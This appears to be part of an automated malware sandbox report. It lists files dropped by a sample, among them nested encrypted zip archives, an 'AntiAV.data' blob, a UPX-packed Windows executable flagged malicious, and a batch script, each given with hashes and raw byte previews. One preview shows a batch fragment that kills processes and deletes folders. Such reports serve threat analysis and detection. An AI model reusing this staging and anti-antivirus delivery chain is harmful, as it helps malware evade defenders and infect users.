                                                                                                                                                                                              SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                              MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                              SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                              SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                              SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2355713
                                                                                                                                                                                              Entropy (8bit):5.891648193754473
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                                                              MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                              SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                              SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                              SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1799594
                                                                                                                                                                                              Entropy (8bit):7.99773141173711
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
                                                                                                                                                                                              MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                                              SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                                              SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                                              SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1799748
                                                                                                                                                                                              Entropy (8bit):7.997729415613798
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
                                                                                                                                                                                              MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                                              SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                                              SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                                              SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1799902
                                                                                                                                                                                              Entropy (8bit):7.997726708945573
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
                                                                                                                                                                                              MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                                              SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                                              SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                                              SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1800056
                                                                                                                                                                                              Entropy (8bit):7.997723543142523
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
                                                                                                                                                                                              MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                                              SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                                              SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                                              SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1800210
                                                                                                                                                                                              Entropy (8bit):7.997720745184939
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
                                                                                                                                                                                              MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                                              SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                                              SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                                              SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1800364
                                                                                                                                                                                              Entropy (8bit):7.997716835838842
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                                                              MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                              SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                              SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                              SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3473559
                                                                                                                                                                                              Entropy (8bit):7.9992359395959935
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                                                              MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                              SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                              SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                              SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1827328
                                                                                                                                                                                              Entropy (8bit):7.963282633529333
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                              MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                              SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                              SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                              SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\file.bin

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3473725
                                                                                                                                                                                              Entropy (8bit):7.999948676888215
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                              MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                              SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                              SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                              SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3473725
                                                                                                                                                                                              Entropy (8bit):7.999948676888215
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                              MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                              SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                              SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                              SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\main.bat

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):440
                                                                                                                                                                                              Entropy (8bit):5.0791308599041844
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                              MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                              SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                              SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                              SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
